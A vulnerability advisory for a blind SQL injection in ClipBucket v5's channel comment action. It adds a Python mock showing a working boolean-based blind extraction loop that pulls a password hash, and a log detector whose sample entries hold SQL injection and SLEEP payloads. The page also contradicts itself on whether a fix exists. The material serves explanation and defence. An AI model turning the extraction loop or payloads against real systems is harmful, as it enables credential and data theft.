Platform: php
Component: clipbucket-v5
Fixed in: 5.5.3
CVE-2026-21875 describes a critical SQL Injection vulnerability discovered in ClipBucket v5, an open-source video sharing platform. This flaw allows attackers to inject malicious SQL code through the add comment section of a channel, potentially leading to unauthorized data access and manipulation. Versions 5.5.2-#187 and earlier are affected, and a patch is available in version 5.5.3.
The SQL injection lets an attacker who can reach the add comment action run attacker-controlled SQL inside the vulnerable query. That can expose sensitive data such as user credentials and video metadata, up to the full database contents, and can also be used to modify or delete data, leading to denial of service or further compromise of the system. Because the injection is blind, the application does not echo query results back to the attacker; data has to be extracted one true/false (or timing) answer at a time, across many requests. The effort is higher, but the impact is the same.
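The following is an added example, not code from ClipBucket or from this advisory, that shows why a blind injection of this kind still leaks data even though nothing is echoed. It mocks the vulnerable pattern (the obj_id value concatenated into the query text) beside the hardened one (type check plus bound parameter) over an in-memory SQLite database. The schema, table and column names, and the assumption that the add-comment handler first checks that the target channel exists, are all constructed for the example; the parameter name obj_id comes from the mitigation text on this page.

```python
import sqlite3
from typing import Callable

# Constructed stand-in for the vulnerable pattern. The schema, table and column
# names below are assumptions for this example; they are not ClipBucket's code.
def build_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE channels (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        CREATE TABLE comments (id INTEGER PRIMARY KEY, obj_id INTEGER, body TEXT);
        INSERT INTO channels VALUES (1, 'demo-channel');
        INSERT INTO users VALUES (1, 'admin', 'secret-hash');
    """)
    return db


def add_comment_vulnerable(db: sqlite3.Connection, obj_id: str, body: str) -> bool:
    """Vulnerable pattern: obj_id is interpolated straight into the SQL text.

    Returns True when the comment was accepted (channel found), False otherwise.
    That single bit of behaviour is the only oracle a blind injection needs.
    """
    row = db.execute(f"SELECT id FROM channels WHERE id = {obj_id}").fetchone()
    if row is None:
        return False
    db.execute("INSERT INTO comments (obj_id, body) VALUES (?, ?)", (row[0], body))
    return True


def add_comment_fixed(db: sqlite3.Connection, obj_id: str, body: str) -> bool:
    """Hardened pattern: validate the shape of the input, then bind it as a parameter."""
    if not obj_id.isdigit():
        return False
    row = db.execute("SELECT id FROM channels WHERE id = ?", (int(obj_id),)).fetchone()
    if row is None:
        return False
    db.execute("INSERT INTO comments (obj_id, body) VALUES (?, ?)", (row[0], body))
    return True


def blind_extract(db: sqlite3.Connection, add_comment: Callable[..., bool],
                  column: str, max_len: int) -> str:
    """Boolean-based blind extraction through the add-comment accept/reject oracle.

    Every candidate character costs one request, which is why a blind
    injection needs many requests to pull out even a short value.
    """
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789-"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            # Keeps the original predicate (id = 1) true and ANDs in the guess.
            payload = (f"1 AND (SELECT substr({column}, {pos}, 1) "
                       f"FROM users WHERE id = 1) = '{ch}'")
            if add_comment(db, payload, "probe"):
                recovered += ch
                break
        else:
            break  # no candidate matched: end of value, or the injection was blocked
    return recovered


if __name__ == "__main__":
    print("vulnerable:", blind_extract(build_db(), add_comment_vulnerable, "password_hash", 16))
    print("fixed:     ", blind_extract(build_db(), add_comment_fixed, "password_hash", 16))
```

Against the vulnerable handler the loop recovers the whole stored value from nothing but accept/reject responses; against the hardened handler every payload fails the digit check before it reaches the database and the loop recovers nothing. The ordering in the fix matters: the type check rejects garbage early, and the bound parameter guarantees that whatever survives is treated as data, not SQL.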
This vulnerability was publicly disclosed on 2026-01-07. No active exploitation campaigns have been publicly reported, and no proof-of-concept (PoC) code has been released as of this writing; the critical severity and the simplicity of the bug class make a public PoC likely, although the EPSS score shown on this page (0.05%) is currently low. It is not listed in the CISA KEV catalog.
Exploit Status
EPSS: 0.05% (14th percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2026-21875 is to upgrade ClipBucket to version 5.5.3 or later, which contains the fix. If upgrading is not immediately possible, add a Web Application Firewall (WAF) rule for the /actions/ajax.php endpoint that rejects any request whose obj_id parameter is not a plain integer; an allow-list on the parameter's expected shape is more robust than filtering SQL keywords, which a blind injection can be rewritten around. Server-side, the durable fix is to validate or cast obj_id and pass it to the database as a bound parameter instead of concatenating it into the query. Monitor application and database logs for bursts of requests to this endpoint with varying obj_id values, which is the pattern a blind extraction produces.
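As an added example (not part of this advisory or of ClipBucket), the allow-list rule above applied to web server access logs: flag every request to /actions/ajax.php whose obj_id is not a bare integer, then count flagged requests per source, since a blind extraction is one request per guessed character. The log lines are constructed for the example in combined log format; the endpoint path and parameter name come from the mitigation text, while the client addresses, timestamps and payloads are made up.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log lines (combined log format). Not real ClipBucket
# traffic: addresses, timestamps and payloads are made up; /actions/ajax.php and
# obj_id are the endpoint and parameter named in the advisory's mitigation text.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Jan/2026:10:00:01 +0000] "GET /actions/ajax.php?obj_id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [07/Jan/2026:10:00:02 +0000] "GET /actions/ajax.php?obj_id=42%20AND%20(SELECT%20substr(password,1,1)%20FROM%20users)%3D%27a%27 HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.5 - - [07/Jan/2026:10:00:03 +0000] "GET /actions/ajax.php?obj_id=42%27%20OR%20SLEEP(5)--%20- HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.7 - - [07/Jan/2026:10:00:04 +0000] "GET /watch_video.php?v=abc123 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TARGET_PATH = "/actions/ajax.php"
NUMERIC_ID = re.compile(r"^\d+$")


def flag_requests(log_text: str) -> list[dict]:
    """Return one record per request to the endpoint whose obj_id is not a plain integer.

    A positive allow-list (digits only) is used rather than a blacklist of SQL
    keywords: a blind injection can be spelled many ways, but a valid id has
    exactly one shape.
    """
    flagged = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path != TARGET_PATH:
            continue
        # parse_qs percent-decodes the value, so the check sees what the app would see.
        for value in parse_qs(url.query, keep_blank_values=True).get("obj_id", []):
            if not NUMERIC_ID.match(value):
                flagged.append({"ip": m["ip"], "ts": m["ts"], "obj_id": value})
    return flagged


def noisy_sources(flagged: list[dict], threshold: int = 2) -> dict[str, int]:
    """Sources that sent at least `threshold` suspicious obj_id values.

    Blind extraction needs one request per guessed character, so request
    volume from a single client is itself a signal worth alerting on.
    """
    counts = Counter(rec["ip"] for rec in flagged)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    hits = flag_requests(SAMPLE_LOG)
    for rec in hits:
        print(rec)
    print("noisy sources:", noisy_sources(hits))
```

One caveat: if the comment is submitted with a POST, obj_id travels in the request body and never appears in the access log, so this log check will miss it. The same digits-only rule then has to be enforced where the body is visible, in the WAF's body inspection or in the application itself.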
Update ClipBucket to a version later than 5.5.2-#187 when one becomes available. Since no fix was available at the time this note was published (it predates the 5.5.3 release listed above), consider additional security measures, such as input validation and sanitization, to mitigate the risk of SQL injection until an update is released.
CVE-2026-21875 is a critical SQL Injection vulnerability affecting ClipBucket video sharing platform versions 5.5.2-#187 and earlier, allowing attackers to inject malicious SQL code.
You are affected if you are running ClipBucket version 5.5.2-#187 or earlier. Upgrade to version 5.5.3 or later to resolve the vulnerability.
The recommended fix is to upgrade ClipBucket to version 5.5.3 or later. As a temporary workaround, implement a WAF rule to filter malicious SQL injection attempts.
While no active exploitation campaigns have been publicly confirmed, the vulnerability's severity and ease of exploitation suggest a high probability of exploitation.
Refer to the ClipBucket project's official website or security advisories for the latest information and updates regarding CVE-2026-21875.